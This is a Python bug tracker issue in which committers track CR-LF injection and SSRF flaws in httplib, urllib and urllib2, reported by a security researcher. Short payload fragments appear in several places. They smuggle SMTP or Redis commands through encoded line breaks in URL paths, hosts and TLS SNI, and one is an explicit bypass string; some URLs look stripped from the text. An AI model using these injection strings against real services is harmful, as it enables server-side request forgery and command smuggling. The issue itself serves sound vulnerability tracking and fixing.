Title: [Security] A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
Type: security Stage:
Components: Versions:
Status: open Resolution:
Dependencies: 30458 32185 Superseder:
Assigned To: Nosy List: christian.heimes, csabella, martin.panter, orange, vstinner
Priority: normal Keywords:

Created on 2017-11-20 14:15 by vstinner, last changed 2018-03-12 22:51 by csabella.

Messages (4)
msg306543 - (view) Author: STINNER Victor (vstinner) * (Python committer) Date: 2017-11-20 14:15
Vulnerabilities described below are likely these ones reported in bpo-30500, but it would be nice to double check if *all* reported vulnerabilities have been fixed!


At July 27, 2017, Orange Tsai (Security Consultant, DEVCORE) reported vulnerabilities in Python, in the code parsing URLs.


His following blog post only contains the vulnerabilities in Python:

Note: His twitter account,

== Issue 1 ==

* CR-LF Injection on HTTP protocol
* Smuggling SMTP protocol over HTTP protocol FROM
>> GET /
<< 421 4.7.0 ubuntu Rejecting open proxy localhost []
Connection closed

=> "SMTP Hates HTTP Protocol It Seems Unexploitable"

"Gopher Is Good What If There Is No Gopher Support?"

"HTTPS What Won't Be Encrypted in a SSL Handshake?"

== Issue 2 ==

* HTTPS: What Won't Be Encrypted in a SSL Handshake?
* Exploit the Unexploitable - Smuggling SMTP over TLS SNI□%0D%0AHELO□□FROM...:25/
<< 250 ubuntu Hello localhost [], please meet you
>> MAIL FROM: <>
<< 250 2.1.0 <>... Sender ok

== Big Picture ==

Python vulnerable to:

* Python httplib:

  * CR-LF Injection: Path, Host and SNI

* Python urllib: 

  * CR-LF Injection: Host and SNI
  * Host Injection

* Python urllib2

  * CR-LF Injection: Host and SNI
msg306980 - (view) Author: Martin Panter (martin.panter) * (Python committer) Date: 2017-11-26 01:00
The square □ in the strings represents a space.

Issue 1 (CRLF in HTTP request path): it looks like the %0D%0A would have to be decoded by an earlier step in the chain to "\r\nHELO . . .". This becomes like the header injection I mentioned in Issue 30458.

Issue 2 (CRLF in HTTPS host): it seems this doesn’t work in Python as a side effect of Issue 22928 blocking generation of the Host field. But if you add a space you bypass that: "https://host%0D%0A%20SLAVEOF . . .:6379".
msg307418 - (view) Author: Martin Panter (martin.panter) * (Python committer) Date: 2017-12-02 00:56
Issue 32185 proposes to stop sending IP addresses in the TLS SNI protocol. Maybe this will help; it depends if it will catch IP address strings with with whitespace or if there are other ways to inject invalid hostnames.
msg313709 - (view) Author: Cheryl Sabella (csabella) * Date: 2018-03-12 22:51
Since issue 32185 has been patched, should this one be revisited to see if that solution helped fixed this one?
Date User Action Args
2018-03-12 22:51:24csabellasetnosy: + csabella, christian.heimes
messages: + msg313709
2017-12-02 00:56:07martin.pantersetdependencies: + SSLContext.wrap_socket sends SNI Extension when server_hostname is IP
messages: + msg307418
2017-11-26 01:00:28martin.pantersetnosy: + orange, martin.panter
dependencies: + CRLF Injection in httplib
messages: + msg306980
2017-11-20 14:15:17vstinnercreate